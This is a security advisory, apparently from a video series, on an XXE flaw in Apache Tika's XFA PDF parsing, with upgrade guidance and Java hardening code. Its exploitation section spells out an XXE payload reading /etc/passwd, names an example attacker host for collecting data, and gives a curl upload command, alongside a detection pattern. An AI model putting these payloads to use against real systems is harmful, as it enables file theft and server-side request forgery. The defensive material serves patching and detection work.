Apache Tika: XML External Entity (XXE) injection (CVE-2025-66516)
Summary
Welcome to Security Spotlight. Today’s episode covers CVE-2025-66516, a critical XXE vulnerability in Apache Tika with the maximum CVSS score of 10.0. Attackers can embed a crafted XFA form in a PDF to trigger XML External Entity injection, potentially exposing sensitive files or making the server send requests to attacker-chosen endpoints.
Product details
This vulnerability affects three Apache Tika components: tika-core versions up to 3.2.1, tika-pdf-module versions up to 3.2.1, and tika-parsers 1.x releases below 2.0.0. Apache Tika is a content analysis toolkit used to extract text and metadata from diverse file formats in Java applications.
Vulnerability type summary
CVE-2025-66516 is an XML External Entity (XXE) injection flaw, classified under CWE-611. XXE occurs when an XML parser processes untrusted input containing external entity references, enabling attackers to read local files, perform server-side request forgery, or launch denial-of-service attacks.
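To make the mechanism concrete, here is a minimal sketch that uses only the JDK's built-in DOM parser, not Tika. It declares a harmless internal entity and shows the parser splicing the entity's value into the document. An external entity declared with SYSTEM is resolved at the same point, which is what lets an attacker pull in a local file or a URL response. The class and method names are illustrative, and the behavior shown assumes the JDK's default parser settings.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

// Illustrative only: shows entity expansion with an unhardened JDK parser.
final class EntityExpansionDemo {

    // Parses the XML with default settings and returns the root element's text.
    static String expandedText(String xml) {
        try {
            DocumentBuilder builder =
                    DocumentBuilderFactory.newInstance().newDocumentBuilder();
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            // Entity references have already been replaced by their values here.
            return doc.getDocumentElement().getTextContent();
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalStateException("could not parse demo XML", e);
        }
    }
}
```

Passing `<!DOCTYPE note [<!ENTITY who "world">]><note>hello &who;</note>` to `expandedText` yields `hello world`: the parser, not the application, decided what text ended up in the document.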
Details of the vulnerability
Researchers discovered that crafted XFA streams embedded in PDF documents bypass tika-core’s default protections, allowing external entity resolution. Although the initial entry point was the tika-pdf-module (CVE-2025-54988), the root cause and fix reside in tika-core. Users who updated only the parser module but not tika-core remained vulnerable. Additionally, in 1.x releases, PDFParser lives in tika-parsers, expanding the affected scope.
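Because the fix lives in tika-core, a deployment check has to look at both artifacts rather than the PDF module alone. The following is a minimal sketch of such a check for the 3.x line, assuming the first fixed version is 3.2.2 as stated in this article. `TikaVersionCheck` and its methods are hypothetical helpers, not part of Tika. Version qualifiers such as `-SNAPSHOT` are ignored, and the 1.x tika-parsers line is not covered.

```java
import java.util.Arrays;

// Hypothetical helper: flags deployments where either artifact predates 3.2.2.
final class TikaVersionCheck {

    // First fixed release for tika-core and tika-pdf-module, per this article.
    private static final int[] FIRST_FIXED = {3, 2, 2};

    // Turns "3.2.1" into {3, 2, 1}; missing or non-numeric parts count as 0.
    static int[] parse(String version) {
        String[] parts = version.trim().split("\\.");
        int[] numbers = new int[3];
        for (int i = 0; i < numbers.length && i < parts.length; i++) {
            // Keep only leading digits so that "2-SNAPSHOT" is read as 2.
            String digits = parts[i].replaceFirst("^(\\d*).*$", "$1");
            numbers[i] = digits.isEmpty() ? 0 : Integer.parseInt(digits);
        }
        return numbers;
    }

    // True when the version is at or above the first fixed release.
    static boolean isFixed(String version) {
        return Arrays.compare(parse(version), FIRST_FIXED) >= 0;
    }

    // Both artifacts must be fixed; a new PDF module on an old core is not enough.
    static boolean deploymentFixed(String coreVersion, String pdfModuleVersion) {
        return isFixed(coreVersion) && isFixed(pdfModuleVersion);
    }
}
```

With these assumptions, `deploymentFixed("3.2.1", "3.2.2")` returns `false`, which mirrors the case described above: the parser module was updated but tika-core was not.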
Conclusion
To mitigate CVE-2025-66516, upgrade all Apache Tika components: tika-core and tika-pdf-module to version 3.2.2 or later, and tika-parsers to 1.28.6 or newer. Review your code for custom XML parser configurations and disable external entity processing. Stay alert for upstream patches and apply them promptly to defend against XXE exploits.
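For the code review step, the sketch below shows one common way to harden an XML parser that your own application code creates. It does not change how Tika configures its internal parsers and is not a substitute for upgrading. It relies on the `disallow-doctype-decl` feature, which the JDK's built-in parser supports; other JAXP implementations may reject that feature, so treat that as an assumption to verify. `XxeHardening` is an illustrative name.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

// Illustrative hardening for application-owned DOM parsers.
final class XxeHardening {

    // Builds a factory that refuses any document carrying a DOCTYPE.
    static DocumentBuilderFactory hardenedFactory() {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        try {
            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            // No DOCTYPE means no entity declarations, internal or external.
            factory.setFeature(
                    "http://apache.org/xml/features/disallow-doctype-decl", true);
        } catch (ParserConfigurationException e) {
            throw new IllegalStateException("parser lacks required hardening", e);
        }
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    // Returns true if the hardened parser accepts the XML, false if it rejects it.
    static boolean isAccepted(String xml) {
        try {
            DocumentBuilder builder = hardenedFactory().newDocumentBuilder();
            builder.parse(new InputSource(new StringReader(xml)));
            return true;
        } catch (SAXException e) {
            return false; // includes the fatal error raised for a DOCTYPE
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }
}
```

Rejecting the DOCTYPE outright is stricter than only disabling external entities, but it leaves no entity declarations for an attacker to abuse. Documents that legitimately need a DTD would require a more selective configuration.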
Watch the full video on YouTube: CVE-2025-66516
Remediation and exploitation details
This chain involves the following actors
- Attacker: External adversary who crafts malicious PDF payloads
- System Administrator: Maintains and updates Apache Tika deployments
The following systems are involved
- Apache Tika Core (Central parsing engine for XML and other document formats): Performs XML processing and resolves entities
- Apache Tika PDF Module (Parses PDF documents, including XFA forms): Entry point where the malicious XFA payload is handed off
- Apache Tika Parsers (Collection of format-specific parsers): In 1.x releases, hosts the PDFParser that processes XFA
Attack entry point
- Crafted XFA payload in PDF: A PDF file embedding an XFA form that defines an external XML entity pointing to sensitive data or a remote endpoint
Remediation actions
Exploitation actions
Define an external entity referencing file:///etc/passwd or http://evil.example.com/collect
- <!DOCTYPE xfa [<!ENTITY exfil SYSTEM "file:///etc/passwd">]>
Upload or email the PDF to trigger automatic parsing
- curl -F "file=@malicious.pdf" https://example.com/parse
Tika parses the embedded XFA while external entity resolution is still enabled
- new AutoDetectParser().parse(TikaInputStream.get(pdfStream), new BodyContentHandler(), new Metadata(), new ParseContext());
Entity resolution leads to inclusion of sensitive content
- Parsed output contains contents of /etc/passwd or attacker host response
Data exfiltration via returned API response or log aggregation
- Response body: "root:x:0:0:root:/root:/bin/bash…"
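The steps above all depend on an entity declared with SYSTEM (or PUBLIC) inside the XFA. As a defense-in-depth sketch, and not a replacement for upgrading, the check below flags such declarations in XFA XML that has already been extracted to a string. The extraction step, the class name `XfaEntityScreen`, and the pattern are all assumptions for illustration. A text heuristic like this can be evaded, for example through alternate encodings, so it should only supplement a patched parser.

```java
import java.util.regex.Pattern;

// Hypothetical pre-parse screen for extracted XFA XML.
final class XfaEntityScreen {

    // Matches general or parameter entities that point at an external resource.
    private static final Pattern EXTERNAL_ENTITY = Pattern.compile(
            "<!ENTITY\\s+(?:%\\s+)?[^\\s>]+\\s+(?:SYSTEM|PUBLIC)\\b");

    // True when the text declares at least one external entity.
    static boolean declaresExternalEntity(String xfaXml) {
        return EXTERNAL_ENTITY.matcher(xfaXml).find();
    }
}
```

Applied to the payload from the first step, `declaresExternalEntity` returns `true`, while an XFA packet with no DOCTYPE returns `false`.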
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k
- https://cve.org/CVERecord?id=CVE-2025-54988
- [2025-12-05] A critical XXE vulnerability in Apache Tika requires an urgent patch.
- [2025-12-06] A maximum severity XXE vulnerability (CVE-2025-66516) discovered in Apache Tika allows XML external entity attacks.
- [2025-12-09] Apache Tika vulnerability CVE-2025-66516 allows XXE attacks, affecting multiple modules.
- [2025-12-09] Critical XXE vulnerability identified in Apache Tika, designated as CVE-2025-66516, with a CVSS score of 10.0.